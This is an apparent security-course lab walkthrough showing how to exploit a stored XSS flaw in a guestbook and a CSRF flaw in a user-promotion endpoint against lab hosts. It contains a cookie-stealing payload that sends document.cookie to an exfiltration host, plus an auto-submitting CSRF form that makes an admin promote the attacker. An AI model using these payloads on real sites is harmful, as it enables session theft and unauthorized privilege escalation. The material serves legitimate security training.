Lab Warmup

---

After discussing the lab components, let us explore how we can use them to exploit a couple of sample vulnerabilities.

---

XSS Warm-Up

Our sample web application is a simple guestbook allowing us to leave entries, which all users can view. An administrator frequently monitors the entries to address spam:

We can confirm an obvious XSS vulnerability by posting the following entry:

<script>alert(1)</script>

Let us develop an exploit to steal the admin user's cookies. We can use the exploitserver for exploit development by using a payload that loads the script from the exploit server:

<script src=""http://exploitserver.htb/exploit"></script>

Afterward, we can create a cookie stealer payload like the following on the exploit server. To exfiltrate the cookie, we can use the exfiltration server:

window.location = "http://exfiltrate.htb/cookiestealer?c=" + document.cookie;

After saving the exploit, we can confirm that it has been saved by accessing the /exploit endpoint:

Lastly, we must wait for the admin user to access the guestbook. The injected XSS payload causes the admin's browser to load the payload from the exploit server, which will exfiltrate the admin user's cookies to the exfiltration server. Accessing the exfiltration server's log at the /log endpoint reveals the exfiltrated cookies:

---

CSRF Warm-Up

The sample web application does not contain much functionality as it is still under construction:

However, we can see that we only have user permissions. There is a promote button. If we press it, the web application informs us that only administrator users can promote other users. However, we can see that the promotion is implemented with the following request:

In particular, this endpoint has no CSRF protection, enabling us to execute a CSRF attack to make an administrator promote our user. To do so, we need to create an HTML form that corresponds to the promotion request:

<html>
  <body>
    <form method="GET" action="http://csrf.vulnerablesite.htb/profile.php">
      <input type="hidden" name="promote" value="htb-stdnt" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Since we do not want the attack to require additional user interaction, we will add JavaScript code that automatically submits the form once the page is loaded:

<script>
	document.forms[0].submit();
</script>

Combining these two parts results in the following payload, which we will save in the exploitserver at exploitserver.htb:

<html>
  <body>
    <form method="GET" action="http://csrf.vulnerablesite.htb/profile.php">
      <input type="hidden" name="promote" value="htb-stdnt" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

We can test our exploit by clicking on View Exploit while being logged in to the vulnerable application. This results in a request to http://exploitserver.htb/exploit, which returns our saved payload. The payload auto-submits the form, creating a cross-origin request to the vulnerable web application. However, since we are not an administrator, the promotion fails:

However, this confirms that our CSRF payload successfully sent the HTTP request to promote our user. To execute the attack, we can deliver our payload to the victim. This will result in the victim accessing http://exploitserver.htb/exploit. After waiting for a few seconds and refreshing the page, we are promoted to admin:

Thus, we successfully exploited the CSRF vulnerability to make the administrator victim promote our user.